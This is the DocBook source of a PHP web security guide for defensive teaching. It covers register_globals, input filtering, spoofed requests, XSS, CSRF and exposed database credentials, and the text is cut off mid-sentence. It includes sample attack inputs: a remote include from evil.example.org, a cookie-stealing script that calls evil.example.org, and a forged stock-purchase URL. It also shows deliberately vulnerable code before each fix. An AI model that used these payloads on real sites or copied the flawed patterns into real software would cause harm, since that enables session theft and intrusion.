<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE book SYSTEM "../../dblite/dblite_htmlents.dtd">

<book id="PHPSEC-GUIDE">
<title>PHP Security Guide</title>

<chapter id="OVERVIEW">
<title>Overview</title>

<sect1 id="WHAT-IS-SECURITY">
<title>What Is Security?</title>
<itemizedlist>
    <listitem>
        <para>Security is a measurement, not a characteristic.</para>
        <para>It is unfortunate that many software projects list security as a
        simple requirement to be met. Is it secure? This question is as
        subjective as asking if something is hot.</para>
    </listitem>
    <listitem>
        <para>Security must be balanced with expense.</para>
        <para>It is easy and relatively inexpensive to provide a sufficient
        level of security for most applications. However, if your security
        needs are very demanding, because you're protecting information that is
        very valuable, then you must achieve a higher level of security at an
        increased cost. This expense must be included in the budget of the
        project.</para>
    </listitem>
    <listitem>
        <para>Security must be balanced with usability.</para>
        <para>It is not uncommon that steps taken to increase the security of
        a web application also decrease the usability. Passwords, session
        timeouts, and access control all create obstacles for a legitimate
        user. Sometimes these are necessary to provide adequate security, but
        there isn't one solution that is appropriate for every application. It
        is wise to be mindful of your legitimate users as you implement
        security measures.</para>
    </listitem>
    <listitem>
        <para>Security must be part of the design.</para>
        <para>If you do not design your application with security in mind, you
        are doomed to be constantly addressing new security vulnerabilities.
        Careful programming cannot make up for a poor design.</para>
    </listitem>
</itemizedlist>
</sect1>

<sect1 id="BASIC-STEPS">
<title>Basic Steps</title>
<itemizedlist>
    <listitem>
        <para>Consider illegitimate uses of your application.</para>
        <para>A secure design is only part of the solution. During
        development, when the code is being written, it is important to
        consider illegitimate uses of your application. Often, the focus is on
        making the application work as intended, and while this is necessary
        to deliver a properly functioning application, it does nothing to help
        make the application secure.</para>
    </listitem>
    <listitem>
        <para>Educate yourself.</para>
        <para>The fact that you are here is evidence that you care about
        security, and as trite as it may sound, this is the most important
        step. There are numerous resources available on the web and in print,
        and several resources are listed in the PHP Security Consortium's
        Library at
        <systemitem role="url">http://phpsec.org/library/</systemitem>.</para>
    </listitem>
    <listitem>
        <para>If nothing else, FILTER ALL EXTERNAL DATA.</para>
        <para>Data filtering is the cornerstone of web application security in
        any language and on any platform. By initializing your variables and
        filtering all data that comes from an external source, you will
        address a majority of security vulnerabilities with very little
        effort. A whitelist approach is better than a blacklist approach. This
        means that you should consider all data invalid unless it can be
        proven valid (rather than considering all data valid unless it can be
        proven invalid).</para>
    </listitem>
</itemizedlist>
</sect1>

<sect1 id="REGISTER-GLOBALS">
<title>Register Globals</title>
<para>The <literal>register_globals</literal> directive is disabled by default
in PHP versions 4.2.0 and greater. While it does not represent a security
vulnerability, it is a security risk. Therefore, you should always develop and
deploy applications with <literal>register_globals</literal> disabled.</para>
<para>Why is it a security risk? Good examples are difficult to produce for
everyone, because it often requires a unique situation to make the risk clear.
However, the most common example is that found in the PHP manual:</para>
<programlisting>
<![CDATA[<?php 

if (authenticated_user()) 
{ 
    $authorized = true; 
} 

if ($authorized) 
{ 
    include '/highly/sensitive/data.php'; 
} 

?>]]>
</programlisting>
<para>With <literal>register_globals</literal> enabled, this page can be
requested with <literal>?authorized=1</literal> in the query string to bypass
the intended access control. Of course, this particular vulnerability is the
fault of the developer, not <literal>register_globals</literal>, but this
indicates the increased risk posed by the directive. Without it, ordinary
global variables (such as <literal>$authorized</literal> in the example) are
not affected by data submitted by the client. A best practice is to initialize
all variables and to develop with <literal>error_reporting</literal> set to
<literal>E_ALL</literal>, so that the use of an uninitialized variable won't
be overlooked during development.</para>
<para>Another example that illustrates how <literal>register_globals</literal>
can be problematic is the following use of <literal>include</literal> with a
dynamic path:</para>
<programlisting>
<![CDATA[<?php

include "$path/script.php";

?>]]>
</programlisting>
<para>With <literal>register_globals</literal> enabled, this page can be
requested with <literal>?path=http%3A%2F%2Fevil.example.org%2F%3F</literal> in
the query string in order to equate this example to the following:</para>
<programlisting>
<![CDATA[<?php

include 'http://evil.example.org/?/script.php';

?>]]>
</programlisting>
<para>If <literal>allow_url_fopen</literal> is enabled (which it is by
default, even in <literal>php.ini-recommended</literal>), this will include
the output of <literal>http://evil.example.org/</literal> just as if it were a
local file. This is a major security vulnerability, and it is one that has
been discovered in some popular open source applications.</para>
<para>Initializing <literal>$path</literal> can mitigate this particular risk,
but so does disabling <literal>register_globals</literal>. Whereas a
developer's mistake can lead to an uninitialized variable, disabling
<literal>register_globals</literal> is a global configuration change that is
far less likely to be overlooked.</para>
<para>The convenience is wonderful, and those of us who have had to manually
handle form data in the past appreciate this. However, using the
<literal>$_POST</literal> and <literal>$_GET</literal> superglobal arrays is
still very convenient, and it's not worth the added risk to enable
<literal>register_globals</literal>. While I completely disagree with
arguments that equate <literal>register_globals</literal> to poor security, I
do recommend that it be disabled.</para>
<para>In addition to all of this, disabling
<literal>register_globals</literal> encourages developers to be mindful of the
origin of data, and this is an important characteristic of any
security-conscious developer.</para>
</sect1>

<sect1 id="DATA-FILTERING">
<title>Data Filtering</title>
<para>As stated previously, data filtering is the cornerstone of web
application security, and this is independent of programming language or
platform. It involves the mechanism by which you determine the validity of
data that is entering and exiting the application, and a good software design
can help developers to:</para>
<itemizedlist>
    <listitem>
        <para>Ensure that data filtering cannot be bypassed,</para>
    </listitem>
    <listitem>
        <para>Ensure that invalid data cannot be mistaken for valid data,
        and</para>
    </listitem>
    <listitem>
        <para>Identify the origin of data.</para>
    </listitem>
</itemizedlist>
<para>Opinions about how to ensure that data filtering cannot be bypassed
vary, but there are two general approaches that seem to be the most common,
and both of these provide a sufficient level of assurance.</para>
<sect2 id="THE-DISPATCH-METHOD">
<title>The Dispatch Method</title>
<para>One method is to have a single PHP script available directly from the
web (via URL). Everything else is a module included with
<literal>include</literal> or <literal>require</literal> as needed. This
method usually requires that a <literal>GET</literal> variable be passed along
with every URL, identifying the task. This <literal>GET</literal> variable can
be considered the replacement for the script name that would be used in a more
simplistic design. For example:</para>
<programlisting>
<![CDATA[http://example.org/dispatch.php?task=print_form]]>
</programlisting>
<para>The file <literal>dispatch.php</literal> is the only file within
document root. This allows a developer to do two important things:</para>
<itemizedlist>
    <listitem>
        <para>Implement some global security measures at the top of
        <literal>dispatch.php</literal> and be assured that these measures
        cannot be bypassed.</para>
    </listitem>
    <listitem>
        <para>Easily see that data filtering takes place when necessary, by
        focusing on the control flow of a specific task.</para>
    </listitem>
</itemizedlist>
<para>To further explain this, consider the following example
<literal>dispatch.php</literal> script:</para>
<programlisting>
<![CDATA[<?php

/* Global security measures */

switch ($_GET['task'])
{
    case 'print_form':
        include '/inc/presentation/form.inc';
        break;

    case 'process_form':
        $form_valid = false;
        include '/inc/logic/process.inc';
        if ($form_valid)
        {
            include '/inc/presentation/end.inc';
        }
        else
        {
            include '/inc/presentation/form.inc';
        }
        break;

    default:
        include '/inc/presentation/index.inc';
        break;
}

?>]]>
</programlisting>
<para>If this is the only public PHP script, then it should be clear that the
design of this application ensures that any global security measures taken at
the top cannot be bypassed. It also lets a developer easily see the control
flow for a specific task. For example, instead of glancing through a lot of
code, it is easy to see that <literal>end.inc</literal> is only displayed to a
user when <literal>$form_valid</literal> is <literal>true</literal>, and
because it is initialized as <literal>false</literal> just before
<literal>process.inc</literal> is included, it is clear that the logic within
<literal>process.inc</literal> must set it to <literal>true</literal>,
otherwise the form is displayed again (presumably with appropriate error
messages).</para>
<note><para>If you use a directory index file such as
<literal>index.php</literal> (instead of <literal>dispatch.php</literal>), you
can use URLs such as
<literal>http://example.org/?task=print_form</literal>.</para>
<para>You can also use the Apache <literal>ForceType</literal> directive or
<literal>mod_rewrite</literal> to accommodate URLs such as
<literal>http://example.org/app/print-form</literal>.</para></note>
</sect2>
<sect2 id="THE-INCLUDE-METHOD">
<title>The Include Method</title>
<para>Another approach is to have a single module that is responsible for all
security measures. This module is included at the top (or very near the top)
of all PHP scripts that are public (available via URL). Consider the following
<literal>security.inc</literal> script:</para>
<programlisting>
<![CDATA[<?php

switch ($_POST['form'])
{
    case 'login':
        $allowed = array();
        $allowed[] = 'form';
        $allowed[] = 'username';
        $allowed[] = 'password';

        $sent = array_keys($_POST);

        if ($allowed == $sent)
        {
            include '/inc/logic/process.inc';
        }

        break;
}

?>]]>
</programlisting>
<para>In this example, each form that is submitted is expected to have a form
variable named <literal>form</literal> that uniquely identifies it, and
<literal>security.inc</literal> has a separate case to handle the data
filtering for that particular form. An example of an HTML form that fulfills
this requirement is as follows:</para>
<programlisting>
<![CDATA[<form action="/receive.php" method="POST">
<input type="hidden" name="form" value="login" />
<p>Username:
<input type="text" name="username" /></p>
<p>Password:
<input type="password" name="password" /></p>
<input type="submit" />
</form>]]>
</programlisting>
<para>An array named <literal>$allowed</literal> is used to identify exactly
which form variables are allowed, and this list must be identical in order for
the form to be processed. Control flow is determined elsewhere, and
<literal>process.inc</literal> is where the actual data filtering takes
place.</para>
<note><para>A good way to ensure that <literal>security.inc</literal> is
always included at the top of every PHP script is to use the
<literal>auto_prepend_file</literal> directive.</para></note>
</sect2>
<sect2 id="FILTERING-EXAMPLES">
<title>Filtering Examples</title>
<para>It is important to take a whitelist approach to your data filtering, and
while it is impossible to give examples for every type of form data you may
encounter, a few examples can help to illustrate a sound approach.</para>
<para>The following validates an email address:</para>
<programlisting>
<![CDATA[<?php

$clean = array();

$email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';

if (preg_match($email_pattern, $_POST['email'])) 
{ 
    $clean['email'] = $_POST['email']; 
}

?>]]>
</programlisting>
<para>The following ensures that <literal>$_POST['color']</literal> is
<literal>red</literal>, <literal>green</literal>, or
<literal>blue</literal>:</para>
<programlisting>
<![CDATA[<?php

$clean = array();

switch ($_POST['color'])
{
    case 'red':
    case 'green':
    case 'blue':
        $clean['color'] = $_POST['color'];
        break;
}

?>]]>
</programlisting>
<para>The following example ensures that <literal>$_POST['num']</literal> is
an integer:</para>
<programlisting>
<![CDATA[<?php

$clean = array();

if ($_POST['num'] == strval(intval($_POST['num'])))
{
    $clean['num'] = $_POST['num'];
}

?>]]>
</programlisting>
<para>The following example ensures that <literal>$_POST['num']</literal> is a
float:</para>
<programlisting>
<![CDATA[<?php

$clean = array();

if ($_POST['num'] == strval(floatval($_POST['num'])))
{
    $clean['num'] = $_POST['num'];
}

?>]]>
</programlisting>
</sect2>
<sect2 id="NAMING-CONVENTIONS">
<title>Naming Conventions</title>
<para>Each of the previous examples make use of an array named
<literal>$clean</literal>. This illustrates a good practice that can help
developers identify whether data is potentially tainted. You should never make
a practice of validating data and leaving it in <literal>$_POST</literal> or
<literal>$_GET</literal>, because it is important for developers to always be
suspicious of data within these superglobal arrays.</para>
<para>In addition, a more liberal use of <literal>$clean</literal> can allow
you to consider everything else to be tainted, and this more closely resembles
a whitelist approach and therefore offers an increased level of
security.</para>
<para>If you only store data in <literal>$clean</literal> after it has been
validated, the only risk in a failure to validate something is that you might
reference an array element that doesn't exist rather than potentially tainted
data.</para>
</sect2>
<sect2 id="TIMING">
<title>Timing</title>
<para>Once a PHP script begins processing, the entire HTTP request has been
received. This means that the user does not have another opportunity to send
data, and therefore no data can be injected into your script (even if
<literal>register_globals</literal> is enabled). This is why initializing your
variables is such a good practice.</para>
</sect2>
</sect1>

<sect1 id="ERROR-REPORTING">
<title>Error Reporting</title>
<para>In versions of PHP prior to PHP 5, released 13 Jul 2004, error reporting
is pretty simplistic. Aside from careful programming, it relies mostly upon a
few specific PHP configuration directives:</para>
<itemizedlist>
    <listitem>
        <para><literal>error_reporting</literal></para>
        <para>This directive sets the level of error reporting desired. It is
        strongly suggested that you set this to <literal>E_ALL</literal> for
        both development and production.</para>
    </listitem>
    <listitem>
        <para><literal>display_errors</literal></para>
        <para>This directive determines whether errors should be displayed on
        the screen (included in the output). You should develop with this set
        to <literal>On</literal>, so that you can be alerted to errors during
        development, and you should set this to <literal>Off</literal> for
        production, so that errors are hidden from the users (and potential
        attackers).</para>
    </listitem>
    <listitem>
        <para><literal>log_errors</literal></para>
        <para>This directive determines whether errors should be written to a
        log. While this may raise performance concerns, it is desirable that
        errors are rare. If logging errors presents a strain on the disk due
        to the heavy I/O, you probably have larger concerns than the
        performance of your application. You should set this directive to
        <literal>On</literal> in production.</para>
    </listitem>
    <listitem>
        <para><literal>error_log</literal></para>
        <para>This directive indicates the location of the log file to which
        errors are written. Make sure that the web server has write privileges
        for the specified file.</para>
    </listitem>
</itemizedlist>
<para>Having <literal>error_reporting</literal> set to
<literal>E_ALL</literal> will help to enforce the initialization of variables,
because a reference to an undefined variable generates a notice.</para>
<note><para>Each of these directives can be set with
<literal>ini_set()</literal>, in case you do not have access to
<literal>php.ini</literal> or another method of setting these
directives.</para>
<para>A good reference on all error handling and reporting functions is in the
PHP manual:</para>
<para><systemitem role="url">http://www.php.net/manual/en/ref.errorfunc.php</systemitem></para>
<para>PHP 5 includes exception handling. For more information, see:</para>
<para><systemitem role="url">http://www.php.net/manual/language.exceptions.php</systemitem></para></note>
</sect1>
</chapter>

<chapter id="FORM-PROCESSING">
<title>Form Processing</title>

<sect1 id="SPOOFED-FORM-SUBMISSIONS">
<title>Spoofed Form Submissions</title>
<para>In order to appreciate the necessity of data filtering, consider the
following form located (hypothetically speaking) at
<literal>http://example.org/form.html</literal>:</para>
<programlisting>
<![CDATA[<form action="/process.php" method="POST">
<select name="color">
    <option value="red">red</option>
    <option value="green">green</option>
    <option value="blue">blue</option>
</select>
<input type="submit" />
</form>]]>
</programlisting>
<para>Imagine a potential attacker who saves this HTML and modifies it as
follows:</para>
<programlisting>
<![CDATA[<form action="http://example.org/process.php" method="POST">
<input type="text" name="color" />
<input type="submit" />
</form>]]>
</programlisting>
<para>This new form can now be located anywhere (a web server is not even
necessary, since it only needs to be readable by a web browser), and the form
can be manipulated as desired. The absolute URL used in the action attribute
causes the <literal>POST</literal> request to be sent to the same
place.</para>
<para>This makes it very easy to eliminate any client-side restrictions,
whether HTML form restrictions or client-side scripts intended to perform some
rudimentary data filtering. In this particular example,
<literal>$_POST['color']</literal> is not necessarily <literal>red</literal>,
<literal>green</literal>, or <literal>blue</literal>. With a very simple
procedure, any user can create a convenient form that can be used to submit
any data to the URL that processes the form.</para>
</sect1>

<sect1 id="SPOOFED-HTTP-REQUESTS">
<title>Spoofed HTTP Requests</title>
<para>A more powerful, although less convenient approach is to spoof an HTTP
request. In the example form just discussed, where the user chooses a color,
the resulting HTTP request looks like the following (assuming a choice of
<literal>red</literal>):</para>
<programlisting>
<![CDATA[POST /process.php HTTP/1.1
Host: example.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

color=red]]>
</programlisting>
<para>The <literal>telnet</literal> utility can be used to perform some ad hoc
testing. The following example makes a simple <literal>GET</literal> request
for <literal>http://www.php.net/</literal>:</para>
<programlisting>
<![CDATA[$ telnet www.php.net 80
Trying 64.246.30.37...
Connected to rs1.php.net.
Escape character is '^]'.
GET / HTTP/1.1
Host: www.php.net

HTTP/1.1 200 OK
Date: Wed, 21 May 2004 12:34:56 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a PHP/4.3.3-dev
X-Powered-By: PHP/4.3.3-dev
Last-Modified: Wed, 21 May 2004 12:34:56 GMT
Content-language: en
Set-Cookie: COUNTRY=USA%2C12.34.56.78; expires=Wed,28-May-04 12:34:56 GMT; path=/; domain=.php.net
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1

2083
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01Transitional//EN">
...]]>
</programlisting>
<para>Of course, you can write your own client instead of manually entering
requests with <literal>telnet</literal>. The following example shows how to
perform the same request using PHP:</para>
<programlisting>
<![CDATA[<?php

$http_response = '';

$fp = fsockopen('www.php.net', 80);
fputs($fp, "GET / HTTP/1.1\r\n");
fputs($fp, "Host: www.php.net\r\n\r\n");

while (!feof($fp))
{
    $http_response .= fgets($fp, 128);
}

fclose($fp);

echo nl2br(htmlentities($http_response));

?>]]>
</programlisting>
<para>Sending your own HTTP requests gives you complete flexibility, and this
demonstrates why server-side data filtering is so essential. Without it, you
have no assurances about any data that originates from any external
source.</para>
</sect1>

<sect1 id="CROSS-SITE-SCRIPTING">
<title>Cross-Site Scripting</title>
<para>The media has helped make cross-site scripting (XSS) a familiar term,
and the attention is deserved. It is one of the most common security
vulnerabilities in web applications, and many popular open source PHP
applications suffer from constant XSS vulnerabilities.</para>
<para>XSS attacks have the following characteristics:</para>
<itemizedlist>
    <listitem>
        <para>Exploit the trust a user has for a particular site.</para>
        <para>Users don't necessarily have a high level of trust for any web
        site, but the browser does. For example, when the browser sends
        cookies in a request, it is trusting the web site. Users may also have
        different browsing habits or even different levels of security defined
        in their browser depending on which site they are visiting.</para>
    </listitem>
    <listitem>
        <para>Generally involve web sites that display external data.</para>
        <para>Applications at a heightened risk include forums, web mail
        clients, and anything that displays syndicated content (such as RSS
        feeds).</para>
    </listitem>
    <listitem>
        <para>Inject content of the attacker's choosing.</para>
        <para>When external data is not properly filtered, you might display
        content of the attacker's choosing. This is just as dangerous as
        letting the attacker edit your source on the server.</para>
    </listitem>
</itemizedlist>
<para>How can this happen? If you display content that comes from any external
source without properly filtering it, you are vulnerable to XSS. Foreign data
isn't limited to data that comes from the client. It also means email
displayed in a web mail client, a banner advertisement, a syndicated blog, and
the like. Any information that is not already in the code comes from an
external source, and this generally means that most data is external
data.</para>
<para>Consider the following example of a simplistic message board:</para>
<programlisting>
<![CDATA[<form>
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

if (isset($_GET['message']))
{
    $fp = fopen('./messages.txt', 'a');
    fwrite($fp, "{$_GET['message']}<br />");
    fclose($fp);
}

readfile('./messages.txt');

?>]]>
</programlisting>
<para>This message board appends <literal>&lt;br /&gt;</literal> to whatever
the user enters, appends this to a file, then displays the current contents of
the file.</para>
<para>Imagine if a user enters the following message:</para>
<programlisting>
<![CDATA[<script>
document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie
</script>]]>
</programlisting>
<para>The next user who visits this message board with JavaScript enabled is
redirected to <literal>evil.example.org</literal>, and any cookies associated
with the current site are included in the query string of the URL.</para>
<para>Of course, a real attacker wouldn't be limited by my lack of creativity
or JavaScript expertise. Feel free to suggest better (more malicious?)
examples.</para>
<para>What can you do? XSS is actually very easy to defend against. Where
things get difficult is when you want to allow some HTML or client-side
scripts to be provided by external sources (such as other users) and
ultimately displayed, but even these situations aren't terribly difficult to
handle. The following best practices can mitigate the risk of XSS:</para>
<itemizedlist>
    <listitem>
        <para>Filter all external data.</para>
        <para>As mentioned earlier, data filtering is the most important
        practice you can adopt. By validating all external data as it enters
        and exits your application, you will mitigate a majority of XSS
        concerns.</para>
    </listitem>
    <listitem>
        <para>Use existing functions.</para>
        <para>Let PHP help with your filtering logic. Functions like
        <literal>htmlentities()</literal>, <literal>strip_tags()</literal>,
        and <literal>utf8_decode()</literal> can be useful. Try to avoid
        reproducing something that a PHP function already does. Not only is
        the PHP function much faster, but it is also more tested and less
        likely to contain errors that yield vulnerabilities.</para>
    </listitem>
    <listitem>
        <para>Use a whitelist approach.</para>
        <para>Assume data is invalid until it can be proven valid. This
        involves verifying the length and also ensuring that only valid
        characters are allowed. For example, if the user is supplying a last
        name, you might begin by only allowing alphabetic characters and
        spaces. Err on the side of caution. While the names
        <literal>O'Reilly</literal> and <literal>Berners-Lee</literal> will be
        considered invalid, this is easily fixed by adding two more characters
        to the whitelist. It is better to deny valid data than to accept
        malicious data.</para>
    </listitem>
    <listitem>
        <para>Use a strict naming convention.</para>
        <para>As mentioned earlier, a naming convention can help developers
        easily distinguish between filtered and unfiltered data. It is
        important to make things as easy and clear for developers as possible.
        A lack of clarity yields confusion, and this breeds
        vulnerabilities.</para>
    </listitem>
</itemizedlist>
<para>A much safer version of the simple message board mentioned earlier is as
follows:</para>
<programlisting>
<![CDATA[<form>
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

if (isset($_GET['message']))
{
    $message = htmlentities($_GET['message']);

    $fp = fopen('./messages.txt', 'a');
    fwrite($fp, "$message<br />");
    fclose($fp);
}

readfile('./messages.txt');

?>]]>
</programlisting>
<para>With the simple addition of <literal>htmlentities()</literal>, the
message board is now much safer. It should not be considered completely
secure, but this is probably the easiest step you can take to provide an
adequate level of protection. Of course, it is highly recommended that you
follow all of the best practices that have been discussed.</para>
</sect1>

<sect1 id="CROSS-SITE-REQUEST-FORGERIES">
<title>Cross-Site Request Forgeries</title>

<para>Despite the similarities in name, cross-site request forgeries (CSRF)
are an almost opposite style of attack. Whereas XSS attacks exploit the trust
a user has in a web site, CSRF attacks exploit the trust a web site has in a
user. CSRF attacks are more dangerous, less popular (which means fewer
resources for developers), and more difficult to defend against than XSS
attacks.</para>
<para>CSRF attacks have the following characteristics:</para>
<itemizedlist>
    <listitem>
        <para>Exploit the trust that a site has for a particular user.</para>
        <para>Many users may not be trusted, but it is common for web
        applications to offer users certain privileges upon logging in to the
        application. Users with these heightened privileges are potential
        victims (unknowing accomplices, in fact).</para>
    </listitem>
    <listitem>
        <para>Generally involve web sites that rely on the identity of the
        users. It is typical for the identity of a user to carry a lot of
        weight. With a secure session management mechanism, which is a
        challenge in itself, CSRF attacks can still be successful. In fact, it
        is in these types of environments where CSRF attacks are most
        potent.</para>
    </listitem>
    <listitem>
        <para>Perform HTTP requests of the attacker's choosing.</para>
        <para>CSRF attacks include all attacks that involve the attacker
        forging an HTTP request from another user (in essence, tricking a user
        into sending an HTTP request on the attacker's behalf). There are a
        few different techniques that can be used to accomplish this, and I
        will show some examples of one specific technique.</para>
    </listitem>
</itemizedlist>
<para>Because CSRF attacks involve the forging of HTTP requests, it is
important to first gain a basic level of familiarity with HTTP.</para>
<para>A web browser is an HTTP client, and a web server is an HTTP server.
Clients initiate a transaction by sending a request, and the server completes
the transaction by sending a response. A typical HTTP request is as
follows:</para>
<programlisting>
<![CDATA[GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*]]>
</programlisting>
<para>The first line is called the request line, and it contains the request
method, request URL (a relative URL is used), and HTTP version. The other
lines are HTTP headers, and each header name is followed by a colon, a space,
and the value.</para>
<para>You might be familiar with accessing this information in PHP. For
example, the following code can be used to rebuild this particular HTTP
request in a string:</para>
<programlisting>
<![CDATA[<?php

$request = '';
$request .= "{$_SERVER['REQUEST_METHOD']} ";
$request .= "{$_SERVER['REQUEST_URI']} ";
$request .= "{$_SERVER['SERVER_PROTOCOL']}\r\n";
$request .= "Host: {$_SERVER['HTTP_HOST']}\r\n";
$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";
$request .= "Accept: {$_SERVER['HTTP_ACCEPT']}\r\n\r\n";

?>]]>
</programlisting>
<para>An example response to the previous request is as follows:</para>
<programlisting>
<![CDATA[HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 57

<html>
<img src="http://example.org/image.png" />
</html>]]>
</programlisting>
<para>The content of a response is what you see when you view source in a
browser. The <literal>img</literal> tag in this particular response alerts the
browser to the fact that another resource (an image) is necessary to properly
render the page. The browser requests this resource as it would any other, and
the following is an example of such a request:</para>
<programlisting>
<![CDATA[GET /image.png HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*]]>
</programlisting>
<para>This is worthy of attention. The browser requests the URL specified in
the <literal>src</literal> attribute of the <literal>img</literal> tag just as
if the user had manually navigated there. The browser has no way to
specifically indicate that it expects an image.</para>
<para>Combine this with what you've learned about forms, and then consider a
URL similar to the following:</para><programlisting>
<![CDATA[http://stocks.example.org/buy.php?symbol=SCOX&quantity=1000]]>
</programlisting>
<para>A form submission that uses the <literal>GET</literal> method can
potentially be indistinguishable from an image request - both could be
requests for the same URL. If <literal>register_globals</literal> is enabled,
the method of the form isn't even important (unless the developer still uses
<literal>$_POST</literal> and the like). Hopefully the dangers are already
becoming clear.</para>
<para>Another characteristic that makes CSRF so powerful is that any cookies
pertaining to a URL are included in the request for that URL. A user who has
an established relationship with <literal>stocks.example.org</literal> (such
as being logged in) can potentially buy <literal>1000</literal> shares of
<literal>SCOX</literal> by visiting a page with an <literal>img</literal> tag
that specifies the URL in the previous example.</para>
<para>Consider the following form located (hypothetically) at
<literal>http://stocks.example.org/form.html</literal>:</para>
<programlisting>
<![CDATA[<p>Buy Stocks Instantly!</p>
<form action="/buy.php">
<p>Symbol: <input type="text" name="symbol" /></p>
<p>Quantity:<input type="text" name="quantity" /></p>
<input type="submit" />
</form>]]>
</programlisting>
<para>If the user enters <literal>SCOX</literal> for the symbol,
<literal>1000</literal> as the quantity, and submits the form, the request
that is sent by the browser is similar to the following:</para>
<programlisting>
<![CDATA[GET /buy.php?symbol=SCOX&quantity=1000 HTTP/1.1
Host: stocks.example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234]]>
</programlisting>
<para>I include a <literal>Cookie</literal> header in this example to
illustrate the application using a cookie for the session identifier. If an
<literal>img</literal> tag references the same URL, the same cookie will be
sent in the request for that URL, and the server processing the request will
be unable to distinguish this from an actual order.</para>
<para>There are a few things you can do to protect your applications against
CSRF:</para>
<itemizedlist>
    <listitem>
        <para>Use <literal>POST</literal> rather than <literal>GET</literal>
        in forms. Specify <literal>POST</literal> in the method attribute of
        your forms. Of course, this isn't appropriate for all of your forms,
        but it is appropriate when a form is performing an action, such as
        buying stocks. In fact, the HTTP specification requires that
        <literal>GET</literal> be considered safe.</para>
    </listitem>
    <listitem>
        <para>Use <literal>$_POST</literal> rather than rely on
        <literal>register_globals</literal>. Using the <literal>POST</literal>
        method for form submissions is useless if you rely on
        <literal>register_globals</literal> and reference form variables like
        <literal>$symbol</literal> and <literal>$quantity</literal>. It is
        also useless if you use <literal>$_REQUEST.</literal></para>
    </listitem>
    <listitem>
        <para>Do not focus on convenience.</para>
        <para>While it seems desirable to make a user's experience as
        convenient as possible, too much convenience can have serious
        consequences. While "one-click" approaches can be made very secure, a
        simple implementation is likely to be vulnerable to CSRF.</para>
    </listitem>
    <listitem>
        <para>Force the use of your own forms.</para>
        <para>The biggest problem with CSRF is having requests that look like
        form submissions but aren't. If a user has not requested the page with
        the form, should you assume a request that looks like a submission of
        that form to be legitimate and intended?</para>
    </listitem>
</itemizedlist>
<para>Now we can write an even more secure message board:</para>
<programlisting>
<![CDATA[<?php

$token = md5(time());

$fp = fopen('./tokens.txt', 'a');
fwrite($fp, "$token\n");
fclose($fp);

?>

<form method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

$tokens = file('./tokens.txt');

if (in_array($_POST['token'], $tokens))
{
    if (isset($_POST['message']))
    {
        $message = htmlentities($_POST['message']);

        $fp = fopen('./messages.txt', 'a');
        fwrite($fp, "$message<br />");
        fclose($fp);
    }
}

readfile('./messages.txt');

?>]]>
</programlisting>
<para>This message board still has a few security vulnerabilities. Can you
spot them?</para>
<para>Time is extremely predictable. Using the MD5 digest of a timestamp is a
poor excuse for a random number. Better functions include
<literal>uniqid()</literal> and <literal>rand()</literal>.</para>
<para>More importantly, it is trivial for an attacker to obtain a valid token.
By simply visiting this page, a valid token is generated and included in the
source. With a valid token, the attack is as simple as before the token
requirement was added.</para>
<para>Here is an improved message board:</para>
<programlisting>
<![CDATA[<?php

session_start();

if (isset($_POST['message']) && isset($_SESSION['token']))
{
    if (isset($_SESSION['token']) && $_POST['token'] == $_SESSION['token'])
    {
        $message = htmlentities($_POST['message']);

        $fp = fopen('./messages.txt', 'a');
        fwrite($fp, "$message<br />");
        fclose($fp);
    }
}

$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;

?>

<form method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

readfile('./messages.txt');

?>]]>
</programlisting>
</sect1>
</chapter>

<chapter id="DATABASES-AND-SQL">
<title>Databases and SQL</title>

<sect1 id="EXPOSED-ACCESS-CREDENTIALS">
<title>Exposed Access Credentials</title>
<para>Most PHP applications interact with a database. This usually involves
connecting to a database server and using access credentials to
authenticate:</para>
<programlisting>
<![CDATA[<?php

$host = 'example.org';
$username = 'myuser';
$password = 'mypass';

$db = mysql_connect($host, $username, $password);

?>]]>
</programlisting>
<para>This could be an example of a file called <literal>db.inc</literal> that
is included whenever a connection to the database is needed. This approach is
convenient, and it keeps the access credentials in a single file.</para>
<para>Potential problems arise when this file is somewhere within document
root. This is a common approach, because it makes <literal>include</literal>
and <literal>require</literal> statements much simpler, but it can lead to
situations that expose your access credentials.</para>
<para>Remember that everything within document root has a URL associated with
it. For example, if document root is
<literal>/usr/local/apache/htdocs</literal>, then a file located at
<literal>/usr/local/apache/htdocs/inc/db.inc</literal> has a URL such as
<literal>http://example.org/inc/db.inc</literal>.</para>
<para>Combine this with the fact that most web servers will serve
<literal>.inc</literal> files as plaintext, and the risk of exposing your
access credentials should be clear. A bigger problem is that any source code
in these modules can be exposed, but access credentials are particularly
sensitive.</para>
<para>Of course, one simple solution is to place all modules outside of
document root, and this is a good practice. Both <literal>include</literal>
and <literal>require</literal> can accept a filesystem path, so there's no
need to make modules accessible via URL. It is an unnecessary risk.</para>
<para>If you have no choice in the placement of your modules, and they must be
within document root, you can put something like the following in your
<literal>httpd.conf</literal> file (assuming Apache):</para>
<programlisting>
<![CDATA[<Files ~ "\.inc$">
    Order allow,deny
    Deny from all
</Files>]]>
</programlisting>
<para>It is not a good idea to have your modules processed by the PHP engine.
This includes renaming your modules with a <literal>.php</literal> extension
as well as using <literal>AddType</literal> to have <literal>.inc</literal>
files treated as PHP files. Executing code out of context can be very
dangerous, because it's unexpected and can lead to unknown results. However,
